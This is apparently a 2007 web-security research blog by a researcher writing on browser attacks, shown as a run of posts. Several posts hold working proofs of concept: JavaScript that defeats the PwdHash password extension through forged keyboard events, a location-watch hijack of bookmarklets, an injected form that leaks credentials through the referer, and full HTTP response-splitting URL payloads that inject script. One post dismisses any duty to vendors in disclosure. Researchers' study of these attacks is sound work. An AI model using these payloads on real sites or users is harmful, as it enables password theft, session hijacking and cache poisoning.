Essentially it just loops through all the forms on a page and sets the method on all forms with password fields to post. So while this will stop you from the attack I described, it will most likely break sites, so once a patch comes out of Mozilla (which I honestly hope it will, because otherwise all their efforts on the previous patch will be in vain), this will need to be removed.

Also, since this script is extracting method and type values from the DOM, it doesn't have to worry about case, obfuscation, etc, so it should not be vulnerable to any obfuscation of either the type or the method properties.

I'm sure you all know how to install Greasemonkey scripts,so I'm not going to bother explaining how to here, because for those who don't there's always Google.

P.S. 50th Post! Hurray, I've managed to actually stay interested in something for an extended period of time. I'm sure that some of the posts were completely disinteresting to people, but I hope that some of them weren't.

More Authenticated Redirect Abuse

A while ago I wrote two posts entitled Detecting Logged In Users and More Logged In User Detection via Authenticated Redirects.

Today I want to expand a bit more on how Authenticated redirects can be abused.

I want to talk about how you can abuse authenticated redirects which only redirect to certain domains (i.e. not yours), and not get stopped by extensions such as SafeHistory and SafeCache.

If we can redirect to any resource on a server it is quite reasonable to assume that we can redirect to either an image or a piece of javascript.

First of all, lets say our redirection script that exists on looks like this: (Ignore the fact that if it was an old version of PHP it would be vulnerable to response splitting, and the fact that parse_url doesn't validate URLs);



if ($_SESSION['logged_in'] == true) {
    if ( is_string($_GET['r']) ) {
        $url_array = parse_url ($_GET['r']);
        if ($url_array['host'] == $_SERVER['SERVER_NAME']) {
            header ("Location: " . $_GET['r']);

header ("Location: http://" . $_SERVER['SERVER_NAME'] . "/index.php");


Knowing that we can redirect to any resource on the server we can create something like the following:

<img src="" onload="alert('logged in');" onerror="alert('not logged in');" />

We could also redirect to javascript objects and overwrite the functions it calls,so that we know when it executes, but that's a whole lot more work.

Also, one other thing I failed to mention in either of the two previous posts, is that the technique I described in them can be used in any situation where something is loaded into the history, which includes iframes, popups, etc - but they are of course much less common.

Saturday, February 24, 2007

Fixing IE Content-Type Detection Issues: Output Filtering Instead Of Input Validation

[EDIT](25/02/07): It seems that this method doesn't completely work, so please read the comments to find more info, because otherwise this isn't going to do you any good.

There's been a bit of discussion over a about injecting Javascript into uploaded image files, and having IE detect the content type as text/html rather than the content-type sent by the server. For anyone who isn't familiar with the issue I recommend you read the following post: Not because its the first mention of it, but its the best and most technical description I've seen.

Anyway; to take a leaf out of Sylvan von Stuppe's book, I'd like to recommend a way to do (the equivalent of) output filtering, rather than input validation to stop this issue.

First of all, lets take a look at why we would ever do input validation to stop XSS attacks. The only reason we have ever had to do input validation is to stop people inputting Javascript, but allowing them to input html.

In all other situations where we don't need to allow certain html, we can simply encode all output in the appropriate char set, and we're safe.

And there is no reason we would ever need to allow users to upload images which get interpreted as html files, and therefore served as such.

So, having established (at least in my view), that output filtering is the way to go; how would we go about doing this without altering the image?

Well, in this case its easy enough; all we need to do is use a header that IE does respect; the Content-Disposition header. And possibly also a Content-Type header of application/octet-stream or we may not, depending on how paranoid we are, and how much we want to (possibly) break things.

There are several way to do this.

On Apache, the best solution is to use mod_headers to send the header for all files in a particular directory, and move all your uploads there.

Microsoft provides an explanation of how you can achieve the same on IIS here:

You can of course, also set PHP or any other server side language as the handler for all the files in a directory, and then use the header() (or similar) function to send the Content-Disposition header tot he browser.

Of course, this might be annoying if a user does something like right click on an image and click view image, but this is a minor inconvenience IMO.

Breaking Firefox's RCSR Fix

In Firefox, the developers have done a lot of good in regards to helping prevent XSS and other attacks against the client; you can read the whole advisory here:

And while their fix for the RCSR issue is good, its not perfect.

As everyone (including people commenting on mozilla's bug tracker) noticed, there is no real way to prevent this if an attacker can execute Javascript on the domain, because he can simply inject an iframe which has an src attribute set to the page which the user normally logs in on, and then simply change its contents to get the password.

Anyway; this fix attempts to solve the issue of an attacker being able to abuse the password manager if the attacker can inject html, but not Javascript. And so, that is the constraints within which we need to break the fix.

Lets assume we have a html injection issue in a page called in the GET parameter search; i.e.<img src=> would inject an image into the page.

What we can then do is inject a form into the page which looks like this:

<form action="" method="get">
    <input type="text" name="username" />
    <input type="password" name="password" />
    <input type="hidden" name="search" value="<img src='' />" />
    <input type="submit" value="Login" />

Then if we get the user to submit the form, then the referers sent to will have the username and password in them.

Of course, our form would have to have an input field which is an image which is transparent but covers the whole browser window, which would submit the form for us, or similar so that the form is submitted but that issue has already been solved, and I wanted to keep the example clean.

On Disclosure

Firstly, just so that you understand my bias, my view on this topic is as follows:

  • I don't care how unethical disclosure is; if it interests me, and possibly others I'll post it.

  • I have no responsibility to give a vendor who has written insecure software time to fix their flaws - they've had time ever since they started writing it.

  • I also have no responsibility to contact them about any issues either.

  • I have no need to justify my position to anyone, and it won't change unless I get paid for it to change.

Anyway; Sid wrote a post on about how an ISP had backdoored its customers routers to make administration easier, entitled Accidental backdoor by ISP, which generated a bit of heat from some people, especially Cd-MaN.

He goes on about how Sid's post was unethical because didn't help anyone by mentioning which ISP it was, and saying which subnet they owned and what the passwords were, other than people who would want to attack the ISP.

Now, arguing on in cd-man's terms, there are people it helps. It helps anyone who wants to do some further investigation of the issue. It helps anyone who has an account with that ISP to secure themselves; I see no reason why it has to be disclosed in such a way that it would reach the majority of affected users, its not our responsibility to fix other people's mistakes; and never should be.

It also helps raise awareness of an issue which hasn't got much (if any) air time before. Because if you read any of the SpeedTouch manuals you will notice that they have a default remote administrator account, which most users never know about. Furthermore I'm willing to bet on the fact that most ISPs who use SpeedTouch routers will all have the same remote admin passwords.

And it really doesn't help anyone to say thing like (
But this recent post on security team screams of the "I'm 1337, I can use nmap, I rooted 14716 computers" sentiment.

Because all it does is spread the FUD. If cd-man had bothered reading the post carefully he would have noticed that all I did was run an nmap scan to determine how many of the hosts were running telnet in that subnet. I think the number is higher than 14716 though, because my wireless network is dodgy and prone to giving out halfway through something, and considering that that scan took hours (unattended), I wouldn't be surprised if it had missed whole chunks.

Oh and he also says:
How does disclosing this flaw with such detail (like subnet addresses and the ISP name) help anyone? The story would have been just as interesting would he left those details out.

I have no real argument her, but I see nothing interesting in someone posting that some ISP somewhere has used the same remote admin password on all its routers. But that's not exactly something we can argue about, since that's just like arguing which tv show is better.

Tuesday, February 20, 2007

Gotcha!: A PHP Oddity (with contrived security implications)

A while ago, I was look over some code a friend of mine (who doesn't write much PHP) had written, which 'worked', but really shouldn't have.

It looked something like this:

if (strpos ($string, "needle") == "needle") {
    print "Is Valid";

And if you know PHP, you'll know that strpos always returns an integer or Boolean false (i.e. it should never return a string), so how the hell could this work?

Well, skipping my usual anecdote; it turns out that PHP casts string to integers when doing comparisons between strings and integers (not the other way around as I would have expected), and so "needle" got cast to an integer, and it was equal to 0. (And since strpos was returning 0 the above code worked).

<Edit> (21/02/07): I realise that there should never be a double dollar vulnerability anywhere in your code, but mistakes are made, this is just what I thought was a curiosity which would interest people; clearly I was wrong. Also, while this uses a double dollar vuln, it is the only way I could come up with to get a string to be compared to an integer (rather than a decimal string) you control.

Now, for the very contrived security issue:


$authenticated = 0;

if (isset($_SESSION['password'])) {
    if ($_SESSION['password'] == "password removed from backup") {
        $authenticated = 1;
} elseif (isset ($_GET['password'])) {
    if ($$_GET['password'] == "password removed from backup") {
        $authenticated = 1;

if ($authenticated == 1) {
    print "You Win!";
} else {
    print "You Fail!";


You'll see the code above has a double dollar vulnerability; which would be unexploitable in this scenario because the password string is not stored in a variable; but rather is hard coded. But since; at this point, the variable $authenticated is equal to zero, we can have $_GET['password'] equal to "authenticated", and $$_GET['password'] is equal to zero, and the comparison works.

Note: The double dollar vuln is needed rather than just passing 0 to a normal comparison because all variables sent through http are strings.

Note2: It doesn't matter in what order the arguments are typed in the comparison, i.e. the following would also be vulnerable:
if ("password removed from backup" == $$_GET['password']) {

Monday, February 19, 2007

You call that a game? This is a......

Firstly; sorry for the lack of updates, I've really been too busy to come up with anything interesting to write, and haven't found anything particularly interesting to write about.

Now, onto the bad title. I found the following "game" on digg: and decided to see exactly how effective the sha-1 rainbowtables I had found were.

Now, the first thing I tried was using since you can crack up to 50 hashes at a time (50 because that is the limit per IP). So I ran the list of hashes against (using a proxy for the second 50) and got quite good results; I think that at least 50 (I wasn't counting) of the hashes I cracked came from

After this I ran the remaining hashes against and and was able to crack a further 20 hashes.

I tried running the remaining 30 against, but got no results (which doesn't really say anything since the only ones left were the ones no-one else could get), and I got interrupted while running the hashes against, which during the time I was away went down, and I don't have an account on (if anyone does, I'd really appreciate it if you got in contact with me), and seems to be down for maintenance.

So while this little anecdote can't testify to the usefulness of any single site (other than, it clearly illustrates that it doesn't matter what hashing algorithm you use if you do not salt the data first, and your users use poor passwords. But we already knew that, so *shrug*.

Tuesday, February 13, 2007

Attacking Aspect Security's PDF UXSS Filter

While this is not really much of an issue any more because Adobe have released and update and there isn't really much to say, I'd like to revisit it for a momment.

There were a lot of people (myself included) who had considered the PDF UXSS issue unsolvable at the server-side level; how wrong we were:

I have no real analysis of it because, as far as I can tell, its bullet proof. or at least it would be if browser security didn't have fist-size holes in it. From a black box perspective where there is no information leakage; that fix is great.

But sadly, there are ways to simply obtain the data. Using an Anti-DNS Pinning attack, it should not be a problem to simply send a request to that IP with the appropriate Host header, etc, and then parse out the link and simply redirect the user. I'm not going to bother providing any code, because there's really nothing new here, just another misfortune.

So a very good idea, is practically useless, simply because the rest of our security model is shot to bits.

A Better Web Cache Timing Attack

I've been thinking on whether I should bother writing an actual paper on this or not, but when I found that Princeton had already written a pretty decent paper on Web Cache timing attacks back in 2000, which you can find here: I decided against it.

If you read the paper you will see that the attack relies on the user of two images to determine if the images are cached by determining if there is a dramatic change in loading times between getting the timing for one image, then loading a page which caches both images, and then getting the timing for the second image. If there is a significant difference, then then the first image had not been cached, and they had therefore not visited the page; whereas if there was no significant difference then the image was already cached, and therefore the page had been viewed before.

Now, this suffers from the fact that you do actually need two images which are ONLY displayed together, because otherwise your results will be erroneous, and not only that; but it requires that the images are approximately the same size so that your inferences about cache state are accurate.

A much better solution is to be able to determine the time it takes to retrieve a cached and non-cached version of an image by supplying request parameters, e.g.

The first thing we do is generate a random request string, and make a request for that image, and we now have the approximate time it should take to get the image when it is not cached, and we then make a second request to see how long the image takes to load when it is cached, and by generating a large amount of query strings to test we can get more accurate amounts.

We then make a request for the image without any request parameters and see which averaged value it is closer to, and then determine cache state.

This benefits from the fact that not only does there only need to be one image, and we can therefore find a page with a large photo or similar to give us a greater margin for error, but we also do not need to find a page with two images of equal size because we will always be making requests for the same size image.

Sadly not quite as effective as the attack against the SafeCache extension, but that's why its a timing attack I guess, :)

Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially it extends the browser same origin policy to the browser cache to defend against cache timing attacks. You can find more info about it here:

Now while I have not looked at the source code to the extension, I have devised a method for not only being able to perform timing attacks, but to be able to directly determine whether or not the objects you are trying to find info about are in the cache or not.

It seems that if you create an iframe element where the src attribute points to the resource whose cache state you want to query, then the onload event will fire only if the item is not in any cache.

To test this either login to Gmail, or go to and then create a page like the following:

function loaded() {
var time = new Date();
var t2 = time.getTime();
alert(t2- t1);
var time = new Date();
var t1 = time.getTime();
<iframe src="" onload="loaded()">

And you will notice that the onload element does not fire. Then if you press Ctrl+Shift+Del and delete the cache, then visit the html page you just created again, the onload event will fire.

If you refresh the page, the onload event will not fire a second time because the image is already in the cache.

So while it stops standard cache timing attacks, it does not stop attacks against itself.

Anatomy of a Worm by Kyran

It’s about the worm I wrote targeting, aptly named ”gaiaworm”. This is the third version of the worm and the first time I’ve ever really written a paper.

Its an interesting paper that details what he has coined a "Pseudo-Reflective" Worm, in that while it uses a reflected XSS vector, it uses a persistent on(in?)-site spreading mechanism - in this case the PM system.

Solving Password Brute Force And Lockout Issues

Locking users out of sites by exhausting a limited number of login attempts has always been a pet peeve of mine (not only because you can sometimes forget which particular password you used; but also because it becomes quite easy to perform a DoS attack against someone's account simply by locking them out via failed login attempts) that I thought most websites had done away with, not so Sudo Labs it seems. Now, I'm not about to take responsibility for this since it isn't our code base, and we didn't even think that it would be set up this way, but when I was talking to Kyran I found out that (much to our chagrin), he had gotten locked out.

Which got me thinking; why can't we have an over-ride code to allow people to login even when their account is being attacked. As I see it there's no reason we can't, we can even re-use existing code to achieve it.

These days when you want to sign up for most sites you get sent an email with an activation code/link which you have to use so that your account is activated, and we know you own the account.

Now, if we were to use the current lockout system, but give users an option to request a special login code, we would be able to leave the normal functionality working most of the time (except for when the user's account is being DoS-ed), but when they are being attacked they would not be locked out because they can easily just request a login code, and use it to bypass the lockout. Of course, this cannot be used by email vendors, who are already the crux of most of our identification, so its not much of an extra burden.

Bookmarklets are NOT secure

Jungsonn wrote a post entitled "Defeating Phishers" where he wrote about how one could distribute risk across two servers, and essentially have one site where XSS vulnerabilities are unimportant, and one which would need to be audited heavily. He also recommended using Bookmarklets because "Bookmarklets are actually pretty secure things, no software or website can access them.".

Personally I disagree with both those statements. Firstly, if you find an XSS hole in the main domain, you can easily make the page say that they've changed their practices, sure it would be a little odd, but the amount of user education required for this attack to be impractical would be enough to solve the whole phishing issue, not just this one.

But more importantly I want to debunk the myth that Bookmarklets are secure. Leaving aside the fact that trojans and similar can easily alter them because they have access to the file system, they are still insecure; they are as insecure as the page they are clicked on is untrustworthy.

For example, lets take the Bookmarklet Jungsonn posted:
javascript:QX=document.getSelection();if(!QX){void(QX=prompt('Type your firstname',''))};if(QX)document.location=''

It would seem fairly secure, except for the fact that with the very allowing Javascript engines, we can stop this from working, here's how:
function changeHandler(x, y, z) {
if (z == '') {
return '';
} else {
return z;
}'location', changeHandler);

If the bookmarklet is clicked on a page with that on it - say a phishing page at or a legitimate page on the domain if it has an XSS hole in it, then we can easily send the user to a phishing page, even though the value is hard coded in the bookmarklet.

Of course, the bookmarklet can try to detect and remove such things, but its a technological battle that will be fought on a bookmarklet by bookmarklet basis; which is essentially where security generally fails - custom code. Of course the other scenario is that we find a secure method of redirecting users, but even if we do, we're not going to be able to get everyone to use it; so I'd rather not recommend bookmarklets as security; just tell users to create a simple bookmark to the site.

Or we could try to educate users to only click on the bookmarklet from a blank page, but thats another area where security generally fails - user education.

Friday, February 09, 2007 - XSS Archive w/ Mirror

One thing that I've thought web app sec was missing that network sec had was a defacement/attack archive w/ mirror, especially after Acunetix decided to pretend that the flaws that had been found and posted on had never existed, something like Zone-h, but for XSS exploits.

Well, today I found a site called which contains an XSS attack archive, with a mirror, which greatly resembles zone-h, but that can only be good since no-one has to figure out a new interface.

Personally I think we should give them our support, because without any way to verify vulnerability claims vendors will still be able to sweep things under the rug, and lie their way though everything. And an unbiased 3rd party is probably a great way to do so.

Sunday, February 04, 2007

This Week in Sec

Excuse the bad pun of a title, but I couldn't come up with anything better. Anyway, as with my last posting of links, its not exactly a week, its probably closer to "the interesting links I've found since I lasted posted a post of links". So here goes:

.aware alpha zine
The people over at have released an ezine, it has nothing to do with web apps, but its still quite good. To quote the front page:
Hello and welcome to the first .aware eZine ever to exist on planet
earth. Basically, with all the h0no wannabes out there and phrack down,
I thought there ought to be a little bit more actual infotainment spread
into cyperspace. This way, maybe not all of us will be driven into
criminal insanity by paranoid hallucinations.

Enjoy the zine.

PS: We're sorry for causing all that cancer.

CAPTCHA Recognition via Averaging
This article describes how certain types of captchas (such as the ones used by a German online-banking site) can be automatically recognized using software. The attack does not recognize one particular captcha itself but exploits a design error allowing to average multiple captchas containing the same information.

This was submitted to bugtraq, and soyou can find the bit of discussion that went on about that here: (Note; this isn't just the single post, there are replies) and because it got separated between the two months, here:

Vista Speech Command Exposes Remote Exploit
Essentially some people found out that Vista doesn't try and do any cancelation of the audio which comes from the speakers to the microphone, and so any commands your computer plays through the speakers will be picked up, and if you have the voice commands activated, will execute.

I didn't break it!
Matt Blaze posted a very good entry about how (crypto) researchers are often described as having cracked codes, and how this taints research. I think this also applies to security research just as much, except for the fact that generally most people say security researchers "broke" something rather than they "cracked" something. He also has another interesting post entitled James Randi owes me a million dollars which I think people should also read.

And in case you somehow managed to miss it:
Sudo Labs is up!
Sudo Labs is an attempt to create an R&D oriented forum where people can come to discuss any ideas they have about security in an environment which focuses on new ideas and techniques, etc rather than explaining old thoughts. Having said that those who aren't experts are also welcomed, just asked to contribute rather than to clog the board with questions about known topics, there are many other boards which will teach you about security.

So that about wraps it up for interesting things I've found over the past week in regards to security, hopefully next time I'll have a better title, but I somehow doubt it.

Saturday, February 03, 2007

Samy Sued and Sentanced

Well, today we've found out that the creater of the MySpace Samy worm has been sued by MySpace and sentanced:,myspace-superworm-creator-sentenced-to-probation-community-service.aspx

I'm honestly lost for words, that comes as quite a shock to me.

Now clearly he has done something wrong (and now it seems - illegal), but I don't think anyone expected this. Especially considering that while it did spread, it was completely non-malicious.

For the moment I'm safe since I've never attacked MySpace, but frankly, I'm just worried that they're going to come after people who have disclosed vulnerabilities in MySpace next.

Friday, February 02, 2007

Attacking the PwdHash Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all the content here:

A while ago I saw an interesting paper/implementation of a way to hash and salt user passwords by domain, so that (I assume) phishing attacks would not be able to steal users' passwords because they are salted with the phishing domain rather than the targeted domain. You can find more info here:

If you read their paper, and the comments in the extension you'll see that they've got pretty much anything you can think of covered. One of the things they haven't been able to stop has been Flash based sniffers, because Javascript extensions don't have any control over 3rd party plugins.

But I have come up with a way to circumvent certain protections and possibly another attack.

To protect against context switching attacks when a user presses the @@ combination or the F2 key into a password field the context cannot be changed without alerting the user if there are less than 5 additional characters.

This is decent protection since you cannot steal the first 5 letters of a user's password, and since user passwords aren't particularly long those first 5 characters are vitally important.

But the extension developers made a few fatal mistakes - they allow the page to receive events of a user pressing the @ key (they do not allow the page to get the F2 key), and they also check how many characters there are in the text box by checking the DOM, and since we are not restricted from changing the DOM we can easily change the contents of the password box.

So what we can do is; detect two presses of the @ key, quickly change the value of the password box to testing or some similar string which is more than 5 chars long, set the focus to another element, and then change the value of the password box to two @ signs, and put the user back in place. you get a little flicker, but most users will discount that, anyway; here's an example:

<script language="javascript">

var text = document.createElement('div');
var last = null;

document.onkeypress = function (e) {

var key = String.fromCharCode(e.charCode);
if (last == '@' && key == '@') {
var pb = document.getElementById("pass");
pb.value = '@@testing';
window.setTimeout("context_switch ();", 1);
text.innerHTML = text.innerHTML + key;
last = key;

function context_switch () {
var pb = document.getElementById("pass");
var tb = document.getElementById("text");
pb.value = '@@';

<input id=pass type=password>
<input id=text type=password style=visibility:hidden>

Another thing Firefox allows you to do is create events, which can be sent to the DOM, and for some reason they do not go through extensions, this is a sort of double edged sword because while we cannot simulate a user typing to an extension, the extension is not aware of us sending events to the DOM.

And since the extension developers are sort of using the password box to store the password (the password box contains @@ABCDEFGH...etc which get mapped to the text you entered by the extension when they're computing the hash) we can insert text into the password box and have it included in the hash, and since we can inject the letters ABCD, etc, we can conduct an attack where we know that say each letter is repeated 3 times (by detecting keyboard events and then sending two of those events to the textbox again), this isn't a real attack atm since I haven't looked at the hashing algorithm, but it should make any cryptanalysis easier if we can repeat any number of letters any number of times.

Also, if we think we can get the user to keep on entering their password over and over again, we can just replace the textbox content with say @@AAAAA or @@BBBBB or @@CCCCC or similar so we can get a hash of a single character repeated, and then have a simple 256 value lookup table.

Ok, I figured out a way to defeat the fact that we can't detect the F2 key being pressed.

It does have some false positives, but this is just to show that an attack is still possible.

Anyway, what we do is detect when we get sent an A, we then check that the length of the text in the password box is > 0 and if it is, we send 4 As to the password box, and swap the context. And record some data, and all we need is a 256 value lookup table. Anyway, here's the PoC:

<script language="javascript">

var text = document.createElement('div');

var enc0 = null;
var enc1 = null;

document.onkeypress = function (e) {

var key = String.fromCharCode(e.charCode);
if (key == 'A') {
var pb = document.getElementById("pass");
window.setTimeout ("test_n_send();", 1);
text.innerHTML = text.innerHTML + key;

function test_n_send() {
var pb = document.getElementById("pass");
var tb = document.getElementById("text");
if (pb.value.length > 0) {
enc0 = pb.value;
enc1 = pb.value;

var enc0b = document.getElementById("enc0");
enc0b.value = enc0;

var enc1b = document.getElementById("enc1");
enc1b.value = enc1;


function send4A() {

var i;

for (i=0;i<4;i++) {
var evt = document.createEvent("KeyboardEvent");
"keypress", // in DOMString typeArg,
false, // in boolean canBubbleArg,
false, // in boolean cancelableArg,
null, // in nsIDOMAbstractView viewArg, Specifies UIEvent.view. This value may be null.
false, // in boolean ctrlKeyArg,
false, // in boolean altKeyArg,
false, // in boolean shiftKeyArg,
false, // in boolean metaKeyArg,
0, // in unsigned long keyCodeArg,
65); // in unsigned long charCodeArg);

var pb = document.getElementById("pass");


<input id=pass type=password>
<input id=text type=password style=visibility:hidden><br />
<input id=enc0><br />
<input id=enc1><br />

Thursday, February 01, 2007

HTTP Response Splitting Attacks Without Proxies

I've had this paper sitting around collecting dust for so long, but I've been keeping it for a reason, me and a friend (troopa) are trying to start a hacker/infosec community focused around Research and Development of ideas and attacks, rather than simply a teaching and learning ground for people, because there are plenty of those already in existence, but very few places where people come together to collaborate on new ideas, and so I present to you Sudo Labs.

I initially posted the full paper on Sudo Labs here:

But now that I've directed a bit of traffic there (that really didn't help), I'm posting it here as well:

[EDIT (14/02/07)]: I've been informed, that my introduction was completely wrong and may have mislead people, and so I've replaced it.

HTTP Response Splitting Attacks Without Proxies

By kuza55
of Sudo labs


1.0 Introduction
2.0 The Attack
    2.1 Theory
    2.2 Browser Inconsistencies
    2.3 Working Exploits
3.0 Implementation Notes
4.0 Conclusion

1.0 Introduction

At the moment, the only know technique (AFAIK - Correct me if I'm wrong) for attacking the browser cache to alter the cache for pages other than the one vulnerable to HTTP Response Splitting is the One proposed by Amit Klein on page 19-21 of this paper:

It utilises the fact that IE operates on only 4 connections to request pages from a single server.

This paper will illustrate something similar.

2.0 The Attack

As many people before me have discovered; if you can force the browser to make a request for a page on the connection you control, you can replace the contents of the page.

The problem has been to force the browser to do just that.

But what if we ask nicely?

2.1 Theory

If in our doctored response we redirect the user to another page on our site and we send the browser the "Keep-Alive: timeout=300" and "Connection: Keep-Alive" headers the browser does exactly what we asked it and sends the request on that connection (except Opera 9, which doesn't want to - Opera 8 does).

The next thing we need to do is to send the browser a "Content-Length: 0" header so that it thinks its received everything its going to from its first request and sends the second request straight away.

We then send the browser a couple of new lines, and then lots of extraneous spaces and then a new line as well.

This works much like a NOP sled in Buffer Overflow attack, because this way we can prepare a landing zone for the browser which it will just ignore before reading the actual response, this gives us greater flexibility in regards to browser inconsistencies and network latency issues.

2.2 Browser Inconsistencies

Sadly not all the browsers react the same way, and so not everything can be done easily, here's a little chart at what I've been able to produce in various browsers so far:

1 = Second request made on the same connection.
2 = Second Response can be injected into
3 = Headers can be injected into the second response
4 = Content-Length Header is strictly obeyed

+ = yes
~ = Sort of
- = No
x = N/A

|Opera 8|+|+|+|+|
|IE 6 |+|+|+|~|
|Opera 9|-|-|-|x|

So essentially I've only really been able to exploit the attack's full potential under IE 6 and Opera 8. So getting this to work under Firefox (and possibly Opera 9) is for people with more experience in how browser work with the network.

The issue with Internet Explorer is that it reads things in 1024 byte blocks, and so any Content-Length headers which to not fall on that boundary will be rounded up to the nearest kilobyte, but that's not much of an issue.

Internet Explorer also has a 2047 byte limitation on query strings, so my original design of using new lines doesn't work because they get encoded in the query string to 3 times their length (6 bytes - %0d%0a - instead of two), and so spaces had to be used as the white spaces to be ignored.

For some reason I can't seem to get Firefox to use the headers I provide, but you can easily inject into the top of the page, and simply make the browser not render the rest by using an unclosed div tag with a display: none style attribute.

Opera 9 (as I mentioned earlier) though, just doesn't want to make the request on the same socket, and so I haven't been able to get this attack to work.

2.3 Working Exploits

Now, onto the interesting part - Working Exploits.

This *works* (To the extent explained above) in both IE and Firefox: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        %0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>

But it doesn't work on Opera 8, Opera 8 works the way you would sort of expect a browser to work, in that it begins reading the stream from where it left off, and so we don't need to provide much whitespace: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>

3.0 Implementation Notes

If anyone wants to use this to use this to perform browser cache poisoning attacks (either to hide the suspicious URL or something similar) then the best way would probably be to check if the URL you are poisoning sends an Etag header and if so replicate that header so that when the browser sends a If-Modified-Since header, then the web server will honestly say it hasn't, if the resource you want to poison is a dynamic resource, you'll have to rely on the Cache-Control and Date headers alone (though these should be used along with the Etag header).

4.0 Conclusion

So as we can see, we don't need a proxy to implement interesting protocol oriented HTTP Response Splitting attacks, and hopefully someone with a deeper understanding of browsers than me can figure out why the above attacks aren't working in Firefox and Opera 9.